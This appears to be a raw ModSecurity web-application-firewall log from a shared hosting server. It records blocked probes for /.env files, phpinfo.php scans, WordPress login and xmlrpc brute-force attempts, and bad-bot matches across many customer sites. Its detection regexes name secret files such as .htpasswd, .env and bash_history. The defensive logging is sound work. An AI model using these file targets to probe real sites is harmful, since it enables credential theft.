[Tue May 26 16:39:33.089455 2026] [security2:error] [pid 817651:tid 817837] [client 5.255.99.53:39968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "plenitudotonal.com"] [uri "/.env"] [unique_id "ahV_bdlGRCPPN1dS2y2gJAAAAL0"]
[Tue May 26 16:39:33.098210 2026] [security2:error] [pid 817651:tid 817808] [client 5.255.99.53:39808] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_bNlGRCPPN1dS2y2gGgAAAKA"]
[Tue May 26 16:39:33.267093 2026] [security2:error] [pid 817651:tid 817906] [client 5.255.99.53:39842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_bdlGRCPPN1dS2y2gIgAAAQI"]
[Tue May 26 16:39:33.270421 2026] [security2:error] [pid 817651:tid 817807] [client 5.255.99.53:39958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_bdlGRCPPN1dS2y2gJwAAAJ8"]
[Tue May 26 16:39:33.275909 2026] [security2:error] [pid 817651:tid 817828] [client 5.255.99.53:40032] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_bdlGRCPPN1dS2y2gJgAAALQ"]
[Tue May 26 16:39:33.277272 2026] [security2:error] [pid 817651:tid 817822] [client 5.255.99.53:40010] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_bdlGRCPPN1dS2y2gJQAAAK4"]
[Tue May 26 16:39:33.280829 2026] [security2:error] [pid 817651:tid 817796] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_atlGRCPPN1dS2y2f5gAAAJQ"]
[Tue May 26 16:39:33.289869 2026] [security2:error] [pid 817651:tid 817787] [client 5.255.99.53:39952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_bdlGRCPPN1dS2y2gIwAAAIs"]
[Tue May 26 16:39:33.457236 2026] [security2:error] [pid 817651:tid 817849] [client 173.239.240.60:21547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahV_bdlGRCPPN1dS2y2gKwAAAMk"]
[Tue May 26 16:39:33.464879 2026] [security2:error] [pid 817651:tid 817831] [client 173.239.240.48:29417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 48.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahV_bdlGRCPPN1dS2y2gLQAAALc"]
[Tue May 26 16:39:33.482990 2026] [security2:error] [pid 817651:tid 817811] [client 173.239.240.39:53403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahV_bdlGRCPPN1dS2y2gLAAAAKM"]
[Tue May 26 16:39:34.282576 2026] [security2:error] [pid 817651:tid 817865] [client 5.255.99.53:39842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gMgAAANk"]
[Tue May 26 16:39:34.291674 2026] [security2:error] [pid 817651:tid 817861] [client 5.255.99.53:40010] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gNQAAANU"]
[Tue May 26 16:39:34.292974 2026] [security2:error] [pid 817651:tid 817884] [client 5.255.99.53:39952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gNgAAAOw"]
[Tue May 26 16:39:34.293292 2026] [security2:error] [pid 817651:tid 817821] [client 5.255.99.53:39732] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gOAAAAK0"]
[Tue May 26 16:39:34.295361 2026] [security2:error] [pid 817651:tid 817890] [client 5.255.99.53:39784] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gOQAAAPI"]
[Tue May 26 16:39:34.299027 2026] [security2:error] [pid 817651:tid 817894] [client 5.255.99.53:39808] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gMwAAAPY"]
[Tue May 26 16:39:34.305752 2026] [security2:error] [pid 817651:tid 817859] [client 5.255.99.53:39968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gNwAAANM"]
[Tue May 26 16:39:34.306750 2026] [security2:error] [pid 817651:tid 817813] [client 5.255.99.53:39684] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gPgAAAKU"]
[Tue May 26 16:39:34.313037 2026] [security2:error] [pid 817651:tid 817781] [client 5.255.99.53:40032] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gOgAAAIU"]
[Tue May 26 16:39:34.316253 2026] [security2:error] [pid 817651:tid 817826] [client 5.255.99.53:40018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gNAAAALI"]
[Tue May 26 16:39:34.324045 2026] [security2:error] [pid 817651:tid 817843] [client 5.255.99.53:39750] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gOwAAAMM"]
[Tue May 26 16:39:34.328082 2026] [security2:error] [pid 817651:tid 817802] [client 5.255.99.53:39958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gPQAAAJo"]
[Tue May 26 16:39:35.128296 2026] [security2:error] [pid 817651:tid 817886] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_bNlGRCPPN1dS2y2gGAAAAO4"]
[Tue May 26 16:39:35.288159 2026] [security2:error] [pid 817651:tid 817822] [client 5.255.99.53:40018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gXQAAAK4"]
[Tue May 26 16:39:35.289330 2026] [security2:error] [pid 817651:tid 817807] [client 5.255.99.53:39732] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gWwAAAJ8"]
[Tue May 26 16:39:35.291861 2026] [security2:error] [pid 817651:tid 817798] [client 5.255.99.53:39808] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gWQAAAJY"]
[Tue May 26 16:39:35.306967 2026] [security2:error] [pid 817651:tid 817828] [client 5.255.99.53:39952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gXAAAALQ"]
[Tue May 26 16:39:35.318442 2026] [security2:error] [pid 817651:tid 817833] [client 5.255.99.53:39842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gYwAAALk"]
[Tue May 26 16:39:35.321011 2026] [security2:error] [pid 817651:tid 817877] [client 5.255.99.53:40032] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gXgAAAOU"]
[Tue May 26 16:39:35.323944 2026] [security2:error] [pid 817651:tid 817846] [client 5.255.99.53:39968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gYQAAAMY"]
[Tue May 26 16:39:35.332059 2026] [security2:error] [pid 817651:tid 817796] [client 5.255.99.53:39750] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gXwAAAJQ"]
[Tue May 26 16:39:35.345426 2026] [security2:error] [pid 817651:tid 817815] [client 5.255.99.53:39684] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gYgAAAKc"]
[Tue May 26 16:39:35.345654 2026] [security2:error] [pid 817651:tid 817906] [client 5.255.99.53:39784] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gWgAAAQI"]
[Tue May 26 16:39:35.348595 2026] [security2:error] [pid 817651:tid 817782] [client 5.255.99.53:40010] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gZAAAAIY"]
[Tue May 26 16:39:35.359215 2026] [security2:error] [pid 817651:tid 817863] [client 5.255.99.53:39958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gYAAAANc"]
[Tue May 26 16:39:35.469931 2026] [security2:error] [pid 817651:tid 817903] [client 5.255.99.53:40156] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gZgAAAP8"]
[Tue May 26 16:39:35.476811 2026] [security2:error] [pid 817651:tid 817786] [client 5.255.99.53:40142] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gZwAAAIo"]
[Tue May 26 16:39:35.837134 2026] [security2:error] [pid 817651:tid 817879] [client 66.146.238.252:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gcAAAAOc"], referer: https://www.anujtradingco.com/
[Tue May 26 16:39:35.992543 2026] [security2:error] [pid 817651:tid 817867] [client 117.198.37.168:49896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gdgAAANs"]
[Tue May 26 16:39:35.992723 2026] [security2:error] [pid 817651:tid 817867] [client 117.198.37.168:49896] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_b9lGRCPPN1dS2y2gdgAAANs"]
[Tue May 26 16:39:36.266398 2026] [security2:error] [pid 817651:tid 817840] [client 195.178.110.34:44416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/portal/.env"] [unique_id "ahV_cNlGRCPPN1dS2y2gewAAAMA"]
[Tue May 26 16:39:37.026097 2026] [security2:error] [pid 817651:tid 817888] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_btlGRCPPN1dS2y2gTgAAAPA"]
[Tue May 26 16:39:37.179870 2026] [security2:error] [pid 817651:tid 817796] [client 66.146.238.252:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_cdlGRCPPN1dS2y2gkwAAAJQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1452157&moderation-hash=3713f104b754417e838469ae6e61f83a
[Tue May 26 16:39:38.855528 2026] [security2:error] [pid 817651:tid 817886] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_cNlGRCPPN1dS2y2ghAAAAO4"]
[Tue May 26 16:39:39.245999 2026] [security2:error] [pid 817651:tid 817828] [client 202.58.72.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_cdlGRCPPN1dS2y2gjwAAALQ"]
[Tue May 26 16:39:41.109935 2026] [security2:error] [pid 817651:tid 817779] [remote 124.156.212.23:65044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahV_dNlGRCPPN1dS2y2g2gAAxn8"]
[Tue May 26 16:39:41.361216 2026] [security2:error] [pid 817651:tid 817897] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_c9lGRCPPN1dS2y2gvgAAAPk"]
[Tue May 26 16:39:41.969222 2026] [security2:error] [pid 817651:tid 817738] [remote 195.178.110.34:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/phpinfo.php"] [unique_id "ahV_ddlGRCPPN1dS2y2g8gAAxFY"]
[Tue May 26 16:39:42.170356 2026] [security2:error] [pid 817651:tid 817880] [client 185.191.171.4:38894] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahV_dtlGRCPPN1dS2y2g-QAAAOg"]
[Tue May 26 16:39:42.170479 2026] [security2:error] [pid 817651:tid 817880] [client 185.191.171.4:38894] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahV_dtlGRCPPN1dS2y2g-QAAAOg"]
[Tue May 26 16:39:42.550805 2026] [security2:error] [pid 817651:tid 817864] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_dNlGRCPPN1dS2y2g0wAAANg"]
[Tue May 26 16:39:43.245238 2026] [security2:error] [pid 817651:tid 817826] [client 195.178.110.34:55216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahV_d9lGRCPPN1dS2y2hFgAAALI"]
[Tue May 26 16:39:43.389972 2026] [security2:error] [pid 817651:tid 817834] [client 20.64.105.244:0] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/index.php"] [unique_id "ahV_ddlGRCPPN1dS2y2g6wAAALo"]
[Tue May 26 16:39:43.390672 2026] [security2:error] [pid 817651:tid 817862] [client 20.64.105.244:42946] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahV_ddlGRCPPN1dS2y2g6QAAANY"]
[Tue May 26 16:39:44.431339 2026] [security2:error] [pid 817651:tid 817786] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_dtlGRCPPN1dS2y2g_wAAAIo"]
[Tue May 26 16:39:44.856359 2026] [security2:error] [pid 817651:tid 817846] [client 114.119.128.127:38611] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV_eNlGRCPPN1dS2y2hPgAAAMY"], referer: http://glorodavionics.com/beta/index.php?route=product/category&path=72_25_108
[Tue May 26 16:39:46.255913 2026] [security2:error] [pid 817651:tid 817906] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_eNlGRCPPN1dS2y2hLgAAAQI"]
[Tue May 26 16:39:46.497448 2026] [security2:error] [pid 817651:tid 817864] [client 117.198.37.168:50218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_etlGRCPPN1dS2y2hYQAAANg"]
[Tue May 26 16:39:46.497569 2026] [security2:error] [pid 817651:tid 817864] [client 117.198.37.168:50218] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_etlGRCPPN1dS2y2hYQAAANg"]
[Tue May 26 16:39:48.561385 2026] [security2:error] [pid 817651:tid 817675] [remote 195.178.110.34:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/phpinfo.php"] [unique_id "ahV_fNlGRCPPN1dS2y2hiQABAhc"]
[Tue May 26 16:39:48.786318 2026] [security2:error] [pid 817651:tid 817867] [client 20.64.105.244:0] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahV_fNlGRCPPN1dS2y2hjAAAANs"], referer: https://207.174.214.47/
[Tue May 26 16:39:48.791801 2026] [security2:error] [pid 817651:tid 817804] [client 20.64.105.244:43902] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahV_fNlGRCPPN1dS2y2higAAAJw"], referer: https://207.174.214.47/
[Tue May 26 16:39:48.799752 2026] [security2:error] [pid 817651:tid 817892] [client 136.144.42.52:25355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 52.42.144.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV_fNlGRCPPN1dS2y2hhQAAAPQ"]
[Tue May 26 16:39:48.853782 2026] [security2:error] [pid 817651:tid 817898] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_etlGRCPPN1dS2y2hZAAAAPo"]
